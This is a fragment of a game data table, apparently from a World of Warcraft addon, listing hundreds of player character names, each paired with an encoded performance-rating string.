["Grimtarg"] = "CT:97/17%RM:591/53%",
["Udo"] = "EB:631/80%EM:936/93%",
["Tentonbeef"] = "UB:361/49%RM:576/60%",
["Orkevin"] = "EB:611/79%EM:759/79%",
["Asilpop"] = "EB:725/92%EM:908/94%",
["Angelús"] = "RT:156/59%EB:588/84%EM:704/84%",
["Kaelins"] = "UB:112/30%CM:202/20%",
["Kaerael"] = "EB:592/78%EM:413/82%",
["Girtholomeu"] = "UT:307/39%EB:590/82%EM:581/91%",
["Orren"] = "CT:141/18%UB:339/42%RM:228/52%",
["Àggro"] = "EB:685/92%EM:775/87%",
["Niceman"] = "EB:571/76%RM:576/62%",
["Cptpicard"] = "UB:112/29%RM:184/51%",
["Nightfrost"] = "EB:649/88%EM:850/89%",
["Spaltz"] = "RT:112/59%EB:526/78%EM:694/81%",
["Mahomies"] = "EB:563/78%EM:828/89%",
["Crushedruid"] = "SB:894/99%SM:1097/99%",
["Gnomeskull"] = "UB:320/36%RM:547/58%",
["Sgathaich"] = "UM:371/38%",
["Apophis"] = "ET:379/92%EB:590/93%LM:932/95%",
["Templeson"] = "UT:95/37%EB:414/80%RM:181/50%",
["Kuzuma"] = "CT:62/21%UM:86/31%",
["Goodvibe"] = "UT:86/35%RB:542/69%RM:653/70%",
["Plusey"] = "RT:377/52%EB:454/83%CM:202/24%",
["Wonkabedtwo"] = "CT:44/15%RB:212/54%UM:149/44%",
["Kabeakers"] = "RT:178/64%EB:430/82%EM:735/77%",
["Forcy"] = "ET:317/88%RB:314/67%RM:476/54%",
["Movez"] = "CB:44/5%UM:281/28%",
["Hulks"] = "RT:199/72%EB:470/89%EM:739/89%",
["Missqueenn"] = "UM:244/25%",
["Atasuke"] = "CM:19/5%",
["Side"] = "CT:17/0%UB:47/36%RM:325/58%",
["Waderoblina"] = "EB:601/79%EM:718/78%",
["Graklos"] = "CB:58/5%UM:114/37%",
["Jespein"] = "RB:381/52%RM:526/58%",
["Prtylilthing"] = "CM:42/14%",
["Asurastrike"] = "UM:241/28%",
["Mickies"] = "CT:37/12%RM:328/74%",
["Demolina"] = "EB:567/75%EM:820/87%",
["Pickoff"] = "CT:185/24%RB:562/74%EM:718/76%",
["Sinisterkelp"] = "RM:486/52%",
["Yubujäger"] = "UB:344/46%RM:685/74%",
["Ihavenodad"] = "UB:324/42%UM:428/46%",
["Gorne"] = "RT:192/64%RB:259/58%RM:466/53%",
["Drixxy"] = "EM:377/79%",
["Hunters"] = "CM:64/23%",
["Megga"] = "UT:95/37%EB:722/92%LM:978/98%",
["Ragedump"] = "UB:284/33%UM:447/46%",
["Speakspanish"] = "EB:732/92%EM:877/88%",
["Demonius"] = "EB:406/78%RM:256/59%",
["Alleged"] = "CM:47/6%",
["Sweetannie"] = "RB:477/66%EM:721/87%",
["Diandianya"] = "CT:62/21%EB:632/82%EM:787/82%",
["Insomriac"] = "UM:260/31%",
["Kaesyy"] = "RB:534/70%EM:722/75%",
["Weii"] = "EB:707/91%LM:945/96%",
["Zurana"] = "EB:722/91%EM:784/82%",
["Jbjd"] = "CT:61/22%RB:539/72%EM:407/81%",
["Asura"] = "EB:712/91%EM:894/93%",
["Floydwarshal"] = "UM:76/28%",
["Kóyú"] = "RB:424/52%RM:472/54%",
["Whorses"] = "RM:651/71%",
["Klarbrunn"] = "UM:364/43%",
["Dathirunne"] = "RB:561/74%RM:599/66%",
["Battlebean"] = "CB:31/3%UM:75/26%",
["Coneofswayze"] = "CM:94/13%",
["Peachdowniez"] = "EM:602/88%",
["Jjr"] = "RM:393/74%",
["Shekeltron"] = "RM:314/68%",
["Cathory"] = "UT:260/31%EB:663/91%LM:943/97%",
["Pikaqiu"] = "EB:577/86%EM:640/83%",
["Frühstück"] = "UM:124/43%",
["Timatyx"] = "EB:660/85%EM:804/84%",
["Ghostreverie"] = "UT:58/26%EB:419/85%RM:203/58%",
["Stickaroo"] = "UM:166/43%",
["Phildunfy"] = "EB:587/77%EM:714/77%",
["Billzx"] = "EB:421/83%RM:216/52%",
["Scratchie"] = "RM:568/61%",
["Deadzoned"] = "RM:506/53%",
["Squirtlebank"] = "UM:288/38%",
["Sumbody"] = "UB:234/29%UM:418/47%",
["Lorienelle"] = "UT:249/32%EB:707/91%EM:871/91%",
["Scootypuff"] = "CM:94/13%",
["Warburton"] = "RT:186/69%EB:585/82%EM:627/80%",
["Paulmighty"] = "EB:439/86%RM:591/69%",
["Noxira"] = "CB:25/0%CM:104/13%",
["Plaugeus"] = "CT:37/10%RB:566/74%EM:735/76%",
["Ickan"] = "RB:446/59%RM:473/52%",
["Kekela"] = "CM:193/20%",
["Bonesizzle"] = "RM:554/57%",
["Couchpillow"] = "EM:799/83%",
["Vyndfury"] = "UM:68/25%",
["Tripleo"] = "RM:167/52%",
["Beady"] = "RB:404/55%RM:590/65%",
["Lehna"] = "CM:43/2%",
["Mullagician"] = "CM:27/0%",
["Vanessaa"] = "CT:27/0%UM:310/32%",
["Younyounyoun"] = "UT:266/35%UB:353/45%RM:576/59%",
["Lumbien"] = "RB:330/73%RM:615/66%",
["Stodanko"] = "RT:181/68%RB:300/50%RM:358/58%",
["Paladinguy"] = "EM:833/89%",
["Shming"] = "EB:606/84%RM:641/71%",
["Lecara"] = "ET:298/85%RB:540/73%EM:504/83%",
["Priestruin"] = "CM:15/21%",
["Sultra"] = "CB:168/19%UM:407/48%",
["Oaks"] = "RB:463/63%EM:712/77%",
["Frostyboi"] = "CB:35/3%RM:470/53%",
["Naughtygg"] = "UM:210/26%",
["Iustitia"] = "UB:102/28%UM:119/40%",
["Helpfully"] = "CB:103/12%CM:143/18%",
["Stsa"] = "RB:403/56%RM:583/62%",
["Crazed"] = "CT:60/7%EB:738/93%SM:1050/99%",
["Hodeybow"] = "EB:581/78%EM:894/91%",
["Exosphere"] = "CB:143/17%RM:508/56%",
["Methtical"] = "UM:297/30%",
["Nickgnollte"] = "UM:310/35%",
["Jawslayer"] = "RM:534/59%",
["Pumpriest"] = "RB:254/55%",
["Armyantsrule"] = "CB:88/10%RM:595/66%",
["Tipsix"] = "EB:598/79%EM:569/91%",
["Pestilince"] = "CM:63/5%",
["Rten"] = "ET:294/84%EB:621/81%EM:829/88%",
["Wonwon"] = "ET:233/76%EB:689/88%RM:357/73%",
["Croutonz"] = "UT:277/35%UB:296/40%RM:297/65%",
["Beefybreasts"] = "CT:130/21%LB:779/97%EM:920/94%",
["Qwq"] = "CT:107/13%EB:673/87%EM:733/79%",
["Smallbbq"] = "CB:126/15%RM:700/73%",
["Iodine"] = "EM:783/76%",
["Chipboi"] = "RB:466/61%RM:574/59%",
["Frozenpipes"] = "UT:91/41%CB:32/2%",
["Onepunched"] = "CB:96/10%",
["Heallyou"] = "RB:538/74%EM:846/90%",
["Stonebones"] = "RM:290/51%",
["Chunti"] = "UM:334/34%",
["Carlpoppa"] = "CM:68/5%",
["Thirdalt"] = "UM:287/29%",
["Szenvedes"] = "ET:621/81%EB:678/87%EM:552/85%",
["Gregnant"] = "EB:638/88%LM:888/95%",
["Kantoboi"] = "UT:130/49%EM:747/79%",
["Nocksage"] = "LM:946/96%",
["Cowayi"] = "CB:58/6%RM:655/70%",
["Dready"] = "RT:452/60%EB:563/75%RM:551/61%",
["Katatafish"] = "RM:504/55%",
["Getsomenerd"] = "UB:316/42%UM:442/48%",
["Tocubus"] = "UM:273/28%",
["Dyingtocast"] = "UT:89/32%UB:189/25%",
["Parjandiya"] = "UM:181/26%",
["Kansanmurha"] = "RM:373/58%",
["Jacoolero"] = "EB:689/88%EM:818/85%",
["Hmongrel"] = "RM:704/74%",
["Magenom"] = "RM:652/71%",
["Rockyraccoon"] = "EM:670/84%",
["Declin"] = "CT:70/6%EB:640/88%EM:800/87%",
["Jackwiz"] = "CT:62/23%UB:323/44%CM:176/17%",
["Magdala"] = "UM:177/48%",
["Confuzedmage"] = "EB:655/91%EM:487/90%",
["Scary"] = "CT:39/4%RB:446/58%RM:486/51%",
["Goobehmayne"] = "CM:207/24%",
["Sylve"] = "CT:13/2%LB:756/98%LM:932/96%",
["Spellshock"] = "RM:341/71%",
["Stormform"] = "EM:746/79%",
["Redstick"] = "CB:114/12%RM:597/66%",
["Ashu"] = "CB:35/3%CM:55/6%",
["Sunnyfornow"] = "CT:30/3%CB:160/18%UM:320/33%",
["Lornashore"] = "UM:434/49%",
["Opti"] = "CB:72/17%CM:132/15%",
["Piken"] = "RT:212/71%EB:709/91%EM:913/94%",
["Powers"] = "RM:479/52%",
["Doubt"] = "EB:745/94%EM:894/93%",
["Jedia"] = "EB:550/76%EM:773/84%",
["Hahk"] = "RM:672/73%",
["Trickyshots"] = "RB:447/62%EM:888/89%",
["Chillybean"] = "CM:189/18%",
["Wrektget"] = "RB:187/68%",
["Shortiwar"] = "RT:138/57%UB:156/33%RM:385/61%",
["Tradeforwatr"] = "UM:349/37%",
["Aterogue"] = "EM:865/89%",
["Uhhuhhuhhuhh"] = "CB:117/15%EM:736/80%",
["Blarksquirt"] = "EB:690/89%EM:850/89%",
["Willthius"] = "UT:204/26%RB:387/52%CM:58/18%",
["Elfenlied"] = "RM:249/58%",
["Moxymary"] = "UT:191/26%UM:309/35%",
["Howtobetoxic"] = "UB:217/29%RM:614/63%",
["Byhee"] = "UB:332/38%EM:760/80%",
["Blackboots"] = "UM:427/48%",
["Jellymage"] = "RT:493/65%UB:328/44%RM:254/65%",
["Chalondra"] = "UM:316/38%",
["Lovethebooty"] = "UT:331/44%EB:715/91%EM:881/91%",
["Rxp"] = "EB:640/81%EM:679/91%",
["Samimaru"] = "CM:174/16%",
["Prisonplanet"] = "EB:636/80%RM:556/63%",
["Veteff"] = "CT:81/7%RB:363/68%EM:554/76%",
["Fiendness"] = "EB:711/89%EM:927/93%",
["Hazards"] = "RB:506/64%RM:526/56%",
["Smolswolhobo"] = "EB:685/86%EM:821/85%",
["Ipex"] = "RM:584/62%",
["Jeerdin"] = "RB:423/58%RM:551/61%",
["Wateroh"] = "CB:83/23%CM:86/12%",
["Restormiru"] = "CB:95/9%RM:504/55%",
["Satanous"] = "CM:28/1%",
["Culligan"] = "UB:370/48%RM:654/72%",
["Bloko"] = "CT:30/7%UB:271/35%RM:221/60%",
["Mpac"] = "LT:535/97%EB:696/89%RM:610/67%",
["Joonlol"] = "RM:639/68%",
["Rust"] = "EB:626/91%EM:569/93%",
["Julyzerg"] = "EB:616/80%EM:803/83%",
["Rastlin"] = "UM:254/30%",
["Prowling"] = "CT:50/5%EB:697/89%EM:890/91%",
["Nezzii"] = "RB:480/64%EM:678/75%",
["Onyisbugged"] = "CB:126/15%CM:41/15%",
["Bighomie"] = "EB:749/94%EM:894/91%",
["Scubasteez"] = "RB:405/57%RM:626/69%",
["Voidlyfe"] = "RB:456/59%UM:420/42%",
["Conartiste"] = "EB:736/93%EM:861/88%",
["Akneja"] = "UB:102/28%EM:387/75%",
["Krenshaww"] = "EB:523/93%EM:880/92%",
["Fantomas"] = "RB:289/64%RM:257/59%",
["Purrple"] = "EB:584/76%RM:631/65%",
["Arcanechops"] = "EB:549/78%EM:805/86%",
["Bori"] = "EB:649/89%EM:829/89%",
["Devastated"] = "ET:577/77%RB:477/67%RM:544/60%",
["Umbras"] = "LB:739/96%EM:901/94%",
["Diggory"] = "CM:198/19%",
["Kyurem"] = "CT:75/23%CB:117/12%UM:441/48%",
["Smotpoke"] = "RM:614/66%",
["Yanni"] = "RM:609/65%",
["Thør"] = "EB:690/88%EM:769/81%",
["Feralhogger"] = "RB:530/67%RM:663/71%",
["Frostycooter"] = "EB:626/82%EM:755/81%",
["Sweatpotato"] = "RB:290/65%RM:290/66%",
["Castre"] = "RB:201/52%RM:156/50%",
["Minda"] = "RM:251/61%",
["Mully"] = "RT:466/64%LB:753/95%LM:954/96%",
["Yungmormont"] = "CM:85/7%",
["Geregis"] = "CB:220/23%CM:72/9%",
["Mastrmago"] = "UM:267/33%",
["Atiba"] = "CM:1/0%",
["Cthulln"] = "CB:45/5%UM:73/28%",
["Merlim"] = "UB:247/34%CM:170/22%",
["Snarfette"] = "LT:780/98%LB:768/98%EM:733/88%",
["Tommytwotoes"] = "UM:276/33%",
["Akku"] = "RB:401/54%EM:799/89%",
["Trolex"] = "CM:41/2%",
["Verinassa"] = "RT:451/62%EB:579/76%EM:690/76%",
["Beanchet"] = "EB:734/92%EM:879/90%",
["Danious"] = "CT:1/0%CB:27/0%UM:124/38%",
["Philbolaggin"] = "EB:551/83%EM:701/84%",
["Holyrage"] = "UB:214/26%CM:181/17%",
["Rumbolt"] = "EB:720/93%EM:854/92%",
["Scuumbag"] = "CM:34/4%",
["Seraph"] = "RB:292/58%RM:506/71%",
["Whiteliquor"] = "RM:648/71%",
["Sumon"] = "RM:503/68%",
["Shadow"] = "EB:658/85%EM:573/86%",
["Wildhotts"] = "RB:388/52%UM:441/48%",
["Buddyy"] = "UB:302/38%UM:159/46%",
["Eazysleezy"] = "CT:33/9%CM:43/3%",
["Bigbananas"] = "EB:577/80%EM:754/81%",
["Frostitoots"] = "RB:561/74%EM:720/78%",
["Aoemage"] = "ET:647/85%EB:644/84%EM:808/86%",
["Nekrona"] = "EB:495/87%EM:910/93%",
["Swagslam"] = "CM:195/20%",
["Faejmus"] = "SB:786/99%EM:817/88%",
["Loseifer"] = "ET:336/88%LB:618/96%LM:918/96%",
["Pezzan"] = "CB:170/19%UM:273/33%",
["Megamage"] = "UB:175/47%UM:411/48%",
["Souldamage"] = "EM:718/76%",
["Vampire"] = "EB:611/84%RM:658/72%",
["Lyndaria"] = "UM:91/43%",
["Leav"] = "EM:792/83%",
["Rxge"] = "RB:461/58%RM:633/68%",
["Lostvayne"] = "UM:176/47%",
["Fifthmagic"] = "RB:479/64%EM:483/86%",
["Holyasuna"] = "UB:361/48%EM:862/91%",
["Lattice"] = "RM:625/67%",
["Woca"] = "EB:616/81%EM:790/84%",
["Benfrank"] = "UM:112/40%",
["Maolatang"] = "RB:429/54%RM:607/65%",
["Humptedumpty"] = "EB:537/76%EM:825/88%",
["Lisaria"] = "UB:262/36%UM:331/39%",
["Tivs"] = "EB:625/82%EM:800/85%",
["Alrescha"] = "RM:116/60%",
["Swizzles"] = "UM:355/42%",
["Paust"] = "CT:7/8%CB:97/23%CM:59/7%",
["Ocy"] = "RM:469/52%",
["Elnoobo"] = "RM:554/60%",
["North"] = "RB:481/63%RM:506/52%",
["Taieda"] = "UM:276/28%",
["Outofpower"] = "EB:504/78%RM:542/74%",
["Brx"] = "EB:687/89%LM:926/95%",
["Laku"] = "EB:594/76%EM:827/86%",
["Hitandmiss"] = "CB:136/14%CM:169/18%",
["Adonord"] = "CB:27/0%CM:173/22%",
["Calipso"] = "UB:303/39%RM:624/69%",
["Lewdilla"] = "LT:476/96%EB:641/92%LM:810/97%",
["Crispyduck"] = "RB:422/55%RM:611/65%",
["Scripture"] = "RM:541/59%",
["Clearlovevii"] = "EB:746/94%LM:962/97%",
["Irksy"] = "EB:653/82%EM:701/75%",
["Bragh"] = "CM:78/9%",
["Skadhi"] = "CM:30/10%",
["Shiftyhooves"] = "UM:137/28%",
["Dman"] = "UB:359/45%RM:679/72%",
["Zeit"] = "UM:120/42%",
["Kantle"] = "RB:208/54%UM:154/49%",
["Rookiez"] = "CM:17/2%",
["Disbelief"] = "RM:539/58%",
["Vadik"] = "RM:648/71%",
["Olgalina"] = "RM:695/74%",
["Thepolice"] = "UT:132/42%LB:750/97%LM:973/98%",
["Traxt"] = "CB:95/23%RM:233/53%",
["Annawilliams"] = "EB:611/80%EM:705/77%",
["Buttercupx"] = "UB:95/27%UM:146/47%",
["Justinê"] = "RB:107/59%UM:137/44%",
["Sixteen"] = "UM:120/33%",
["Nickz"] = "EB:662/84%EM:908/92%",
["Wiltonty"] = "CM:22/5%",
["Zaat"] = "EB:620/79%EM:870/89%",
["Eymas"] = "EB:590/82%RM:668/74%",
["Aimy"] = "RT:432/58%EB:697/89%EM:789/82%",
["Simonk"] = "EB:644/83%LM:942/95%",
["Taurospkm"] = "CM:37/23%",
["Warcantlock"] = "EB:662/85%EM:840/87%",
["Warinii"] = "EB:721/91%EM:872/89%",
["Wetin"] = "CT:65/24%UB:129/36%RM:219/60%",
["Huchiemama"] = "RB:368/74%RM:676/70%",
["Iolqt"] = "CT:30/2%RB:539/70%EM:753/78%",
["Blueqq"] = "UT:118/45%EB:635/83%EM:783/84%",
["Lilthotdot"] = "RB:311/72%RM:622/72%",
["Aldritch"] = "CT:48/5%UB:241/32%UM:84/32%",
["Chyllz"] = "CB:116/14%RM:602/66%",
["Slidtzko"] = "CB:40/4%RM:191/56%",
["Dekusprout"] = "RM:202/60%",
["Adraestus"] = "UM:82/31%",
["Wrecktangle"] = "EB:664/84%EM:929/94%",
["Hexamage"] = "EM:518/88%",
["Reeak"] = "EM:825/85%",
["Toojz"] = "EB:711/93%EM:905/94%",
["Chibimaruko"] = "LB:550/95%EM:734/80%",
["Horridus"] = "EB:689/87%EM:827/85%",
["Snoogles"] = "UM:156/45%",
["Hk"] = "ET:641/85%LB:764/96%LM:950/96%",
["Kindamad"] = "RT:542/74%RB:475/63%CM:47/6%",
["Benisatwo"] = "RB:379/50%UM:244/30%",
["Iolitrollu"] = "UB:195/48%RM:589/63%",
["Cursedone"] = "UM:89/31%",
["Vforcee"] = "RT:555/73%EB:624/81%RM:240/54%",
["Tralfaz"] = "UB:202/25%UM:374/40%",
["Stabnasty"] = "CB:178/21%RM:500/53%",
["Smokefat"] = "RB:492/66%EM:739/78%",
["Erasure"] = "CT:63/7%RB:564/72%EM:774/81%",
["Orcasm"] = "EB:720/94%LM:919/95%",
["Tronic"] = "RM:586/60%",
["Huntcore"] = "EB:697/90%EM:612/92%",
["Wayubeefn"] = "CB:71/8%",
["Dairon"] = "EB:721/91%EM:873/90%",
["Tdlicho"] = "CM:53/20%",
["Jayalenn"] = "UM:420/49%",
["Fooie"] = "EB:680/92%EM:753/82%",
["Tankboii"] = "RM:325/54%",
["Corono"] = "CM:90/12%",
["Wente"] = "UB:338/43%RM:553/57%",
["Silverbackk"] = "RM:542/56%",
["Tri"] = "CT:75/11%CB:71/6%LM:824/98%",
["Friskywisky"] = "RB:558/71%RM:479/74%",
["Kucky"] = "UM:258/31%",
["Scaramon"] = "UB:357/49%RM:639/68%",
["Whiskyjack"] = "RT:160/58%EB:660/83%EM:793/83%",
["Korupt"] = "LB:625/95%LM:776/95%",
["Dracarys"] = "UM:316/33%",
["Mapleleaves"] = "CM:41/5%",
["Frostiee"] = "UB:235/30%UM:330/34%",
["Dazilla"] = "CB:188/23%CM:159/14%",
["Trollesaurus"] = "EB:683/88%EM:790/84%",
["Belanna"] = "UM:187/27%",
["Tanginamo"] = "CB:156/19%CM:28/0%",
["Jimmboslice"] = "CB:201/24%RM:492/57%",
["Virtune"] = "UT:117/44%CM:61/8%",
["Bhram"] = "CM:31/2%",
["Zeggopolis"] = "CT:149/17%RM:352/61%",
["Xîlo"] = "CT:70/13%CB:152/16%RM:544/58%",
["Frosttweaker"] = "UT:86/39%RB:442/58%RM:630/69%",
["Mexibeast"] = "CT:34/3%RB:500/66%EM:782/84%",
["Cocou"] = "RB:539/72%EM:704/77%",
["Ferror"] = "UM:353/37%",
["Fudgies"] = "EB:565/75%RM:475/52%",
["Amoraw"] = "CM:78/6%",
["Panamon"] = "CM:138/13%",
["Xelima"] = "CT:47/5%RB:547/72%EM:873/87%",
["Yellowlotus"] = "CM:17/7%",
["Cira"] = "RT:219/73%RB:499/66%EM:338/75%",
["Costcohotdog"] = "UM:422/46%",
["Shmedreg"] = "RM:187/50%",
["Hahifuheho"] = "UB:366/49%RM:616/68%",
["Fenixsixsix"] = "RB:414/56%RM:673/71%",
["Twohats"] = "CT:55/5%EB:569/77%EM:746/78%",
["Tyrantus"] = "UB:209/27%",
["Juug"] = "CT:50/5%EB:593/78%EM:835/88%",
["Onewomanzoo"] = "EB:642/87%EM:722/79%",
["Quelcrist"] = "UM:328/39%",
["Loked"] = "CT:73/6%CB:68/5%CM:238/24%",
["Mottos"] = "ET:289/83%RB:266/60%EM:792/82%",
["Khorra"] = "UB:230/30%RM:534/59%",
["Fkchina"] = "CM:80/10%",
["Cudda"] = "CB:120/14%RM:636/70%",
["Darkalpha"] = "CM:92/9%",
["Pylsner"] = "RB:216/53%UM:401/45%",
["Runtette"] = "CM:147/14%",
["Putri"] = "RB:508/70%EM:732/77%",
["Fobohu"] = "CM:123/14%",
["Mickeldoo"] = "CM:85/7%",
["Blazon"] = "CM:25/0%",
["Natedabait"] = "UB:143/38%",
["Thohgirl"] = "UB:205/48%UM:359/39%",
["Uggabugga"] = "EB:651/92%EM:598/81%",
["Boofit"] = "UM:258/26%",
["Fzero"] = "RB:308/67%UM:384/39%",
["Shirtlessdon"] = "CT:31/6%RB:242/55%RM:702/66%",
["Spaztier"] = "CM:42/15%",
["Ghxst"] = "CT:49/16%CB:94/11%UM:132/42%",
["Akumahime"] = "CM:101/14%",
["Thrillur"] = "RB:520/69%EM:873/91%",
["Saintsebo"] = "UM:93/43%",
["Irongol"] = "RT:390/63%EB:599/85%EM:751/87%",
["Evanie"] = "UM:308/37%",
["Urpo"] = "ET:660/87%LB:765/96%SM:1009/99%",
["Calvus"] = "ET:374/75%EB:466/77%EM:651/79%",
["Browntown"] = "CM:11/4%",
["Wightmayne"] = "UM:129/39%",
["Lewie"] = "CT:47/9%CB:70/16%CM:36/11%",
["Alcione"] = "UM:317/33%",
["Vrosta"] = "RB:488/66%RM:606/69%",
["Wildon"] = "ET:256/80%EB:597/78%EM:738/78%",
["Birrnye"] = "CT:27/1%EB:729/93%EM:902/93%",
["Bladadah"] = "RB:543/73%EM:771/81%",
["Pyonpyon"] = "EB:653/84%EM:830/86%",
["Wren"] = "LB:729/95%LM:887/95%",
["Minthaze"] = "EB:360/75%EM:536/86%",
["Fadàtsaí"] = "UB:286/37%RM:203/58%",
["Danerian"] = "RT:476/67%EB:716/91%EM:673/92%",
["Djeeta"] = "RB:450/57%RM:631/67%",
["Misstical"] = "UB:279/37%EM:756/82%",
["Cryopathy"] = "RB:554/73%EM:808/86%",
["Symbiotik"] = "EB:609/79%RM:660/68%",
["Hatomcduff"] = "UB:321/43%RM:533/59%",
["Rikflare"] = "RB:480/63%EM:775/81%",
["Azoce"] = "EB:706/92%EM:892/94%",
["Seishen"] = "RB:359/50%RM:653/72%",
["Bramstalk"] = "CM:150/15%",
["Extasis"] = "RM:632/69%",
["Kerpow"] = "CM:87/8%",
["Sckmepq"] = "EB:571/79%RM:595/66%",
["Banelings"] = "UT:250/37%RB:374/51%UM:136/45%",
["Sixtea"] = "EB:716/92%EM:905/93%",
["Staraequitas"] = "CT:36/4%EM:854/91%",
["Mòrag"] = "UM:146/42%",
["Imvirgin"] = "EB:568/80%EM:794/85%",
["Kukii"] = "CB:74/20%CM:61/23%",
["Finàl"] = "EB:726/92%EM:876/90%",
["Skreez"] = "RB:378/51%RM:564/62%",
["Twigsie"] = "CB:120/15%CM:171/20%",
["Drdrip"] = "RB:548/70%RM:687/73%",
["Xanaduu"] = "CM:35/3%",
["ßackstabbath"] = "EB:603/77%EM:834/86%",
["Frostysnoman"] = "CT:49/22%RB:464/61%RM:666/73%",
["Ozarian"] = "RB:523/69%EM:726/79%",
["Ilyaska"] = "RB:496/64%RM:585/63%",
["Jilin"] = "EB:715/93%EM:818/91%",
["Aegis"] = "RT:116/50%EB:695/91%EM:739/89%",
["Minidoom"] = "RB:538/70%RM:555/57%",
["Daemons"] = "CM:152/20%",
["Vykrul"] = "CM:183/23%",
["Frostease"] = "UM:394/42%",
["Kriscore"] = "CB:90/10%RM:527/56%",
["Sindari"] = "UM:104/44%",
["Ocellaris"] = "UM:275/28%",
["Taiketsu"] = "CM:185/21%",
["Madhunt"] = "CB:37/3%RM:483/53%",
["Marne"] = "CM:16/0%",
["Hkarmy"] = "RB:418/58%RM:513/54%",
["Funkÿ"] = "LB:747/95%LM:947/96%",
["Wiggles"] = "EB:701/92%EM:870/93%",
["Riffky"] = "CB:10/1%UM:88/33%",
["Shivvy"] = "CB:166/20%RM:238/54%",
["Docllo"] = "CB:32/4%UM:247/28%",
["Zaetuk"] = "UB:267/33%RM:353/70%",
["Overgeared"] = "CB:220/23%RM:678/72%",
["Drupid"] = "RM:452/72%",
["Brootsqaud"] = "CM:202/21%",
["Shaduwudps"] = "RM:361/62%",
["Powersquat"] = "CM:178/18%",
["Excitement"] = "EB:342/77%EM:780/82%",
["Ambtion"] = "CB:169/21%RM:497/54%",
["Chaselucy"] = "RB:430/56%RM:608/65%",
["Slowmam"] = "RB:354/57%RM:379/60%",
["Sinistroni"] = "CB:30/1%",
["Sanshidisahs"] = "RM:182/55%",
["Craghack"] = "RT:156/57%EB:725/91%LM:928/95%",
["Nubhunter"] = "EB:687/88%EM:745/80%",
["Guamgirl"] = "CM:42/6%",
["Saltytoyo"] = "EB:584/82%EM:641/81%",
["Yimibanban"] = "LB:734/97%LM:942/97%",
["Gitmo"] = "EB:732/93%EM:899/93%",
["Soulraper"] = "EB:399/79%UM:439/44%",
["Lamarvannoy"] = "RB:451/59%RM:639/68%",
["Watchdog"] = "RB:484/64%RM:684/73%",
["Shabbah"] = "UM:402/43%",
["Frostbone"] = "UB:195/26%RM:250/65%",
["Alioq"] = "CB:56/14%UM:248/25%",
["Alphaqutwice"] = "UB:282/38%CM:130/11%",
["Ironhorny"] = "EB:727/92%LM:967/97%",
["Claphands"] = "RB:408/55%RM:480/55%",
["Nopickle"] = "UM:451/47%",
["Dajierw"] = "EM:689/76%",
["Smagodx"] = "RM:509/60%",
["Kospi"] = "EB:635/80%EM:830/86%",
["Superstylin"] = "LB:768/96%SM:999/99%",
["Traparwaves"] = "CM:82/11%",
["Tsukikurai"] = "LB:763/96%EM:745/77%",
["Woopsies"] = "UM:249/28%",
["Kaeel"] = "UB:117/33%UM:294/35%",
["Dankshocks"] = "CB:25/0%UM:71/26%",
["Cawkzilla"] = "EB:671/85%EM:570/76%",
["Lunarqt"] = "RM:467/55%",
["Lockalot"] = "UM:248/25%",
["Duckman"] = "CB:114/14%UM:328/32%",
["Zulmok"] = "UM:299/30%",
["Swaglol"] = "EB:710/90%EM:810/84%",
["Hodin"] = "UM:383/39%",
["Disabela"] = "EM:825/85%",
["Fjyrin"] = "LB:778/97%SM:996/99%",
["Niteyes"] = "EB:589/82%EM:798/87%",
["Acecracker"] = "CB:110/13%RM:646/71%",
["Velex"] = "UB:228/27%RM:260/57%",
["Sothirsty"] = "CB:34/5%UM:129/44%",
["Løopy"] = "UB:253/29%CM:19/3%",
["Grabncheeks"] = "UT:56/25%CM:170/22%",
["Kakaka"] = "EB:696/89%EM:860/88%",
["Krulcola"] = "RB:251/57%CM:126/16%",
["Crysta"] = "UT:121/45%RB:360/52%RM:495/54%",
["Chosho"] = "UM:435/48%",
["Frostfour"] = "CM:86/12%",
["Daubo"] = "EB:746/94%EM:874/90%",
["Trinketmage"] = "EB:571/81%RM:654/72%",
["Koyukî"] = "RB:359/50%UM:430/44%",
["Fonzr"] = "RB:517/66%EM:805/83%",
["Cthea"] = "UB:327/40%CM:210/21%",
["Gizmosis"] = "UT:118/44%EB:689/89%EM:761/82%",
["Soul"] = "UT:195/25%LB:755/95%EM:828/87%",
["Dalryn"] = "RB:466/61%EM:872/89%",
["Dangger"] = "CM:179/17%",
["Sagee"] = "CM:44/3%",
["Olongjohnson"] = "RM:494/54%",
["Silarx"] = "CM:1/0%",
["Fleettwood"] = "UT:69/25%RM:504/55%",
["Kawkeys"] = "RM:208/53%",
["Nepher"] = "CM:18/4%",
["Kyrioszero"] = "CM:43/4%",
["Tokalu"] = "CB:84/9%UM:401/46%",
["Notsuugs"] = "RM:624/73%",
["Xinxinxin"] = "EB:646/88%LM:911/95%",
["Slump"] = "RT:117/59%EB:481/78%LM:908/96%",
["Nabou"] = "RT:194/66%EB:606/77%EM:837/86%",
["Salaboutloot"] = "CM:251/24%",
["Fourleafz"] = "CM:66/6%",
["Winterbourne"] = "CM:31/2%",
["Discoqueso"] = "RM:433/51%",
["Bigpops"] = "RB:415/58%RM:605/67%",
["Azman"] = "RT:447/59%EB:519/88%EM:874/90%",
["Zajewmafoo"] = "CT:107/14%RB:487/63%RM:639/66%",
["Kramore"] = "RB:508/66%RM:537/55%",
["Lukani"] = "UB:334/43%RM:584/64%",
["Epic"] = "UB:301/39%RM:239/63%",
["Cinderbinder"] = "EB:744/94%LM:955/97%",
["Hellachill"] = "RM:626/67%",
["Npap"] = "LB:769/96%LM:932/95%",
["Hellct"] = "RT:201/69%EB:737/93%LM:946/96%",
["Effies"] = "UB:306/39%UM:308/32%",
["Uzax"] = "UM:305/31%",
["Drsmug"] = "SB:826/99%SM:1048/99%",
["Froztee"] = "ET:300/86%EB:662/86%LM:925/95%",
["Grubz"] = "ET:255/80%EB:649/85%LM:925/95%",
["Jaemz"] = "ET:369/93%EB:704/92%EM:825/91%",
["Rexxigal"] = "UT:120/43%RB:218/51%UM:101/30%",
["Bryanz"] = "CM:162/22%",
["Cigart"] = "ET:338/90%EB:705/89%EM:838/86%",
["Milkmeðaddy"] = "CB:79/7%UM:88/48%",
["Hase"] = "RB:437/55%EM:766/80%",
["Nohtaram"] = "RB:471/70%EM:734/86%",
["Stripclubs"] = "CM:26/0%",
["Lootcifer"] = "RM:369/64%",
["Zamba"] = "UM:376/40%",
["Freezeyune"] = "UB:212/26%CM:88/8%",
["Ohaw"] = "UB:291/49%RM:395/61%",
["Darktodd"] = "EB:749/94%EM:872/89%",
["Bannedname"] = "RB:437/60%EM:792/85%",
["Krasiana"] = "UM:289/28%",
["Mylá"] = "EM:695/76%",
["Viska"] = "EB:631/86%EM:903/94%",
["Mordaem"] = "RB:436/55%EM:761/80%",
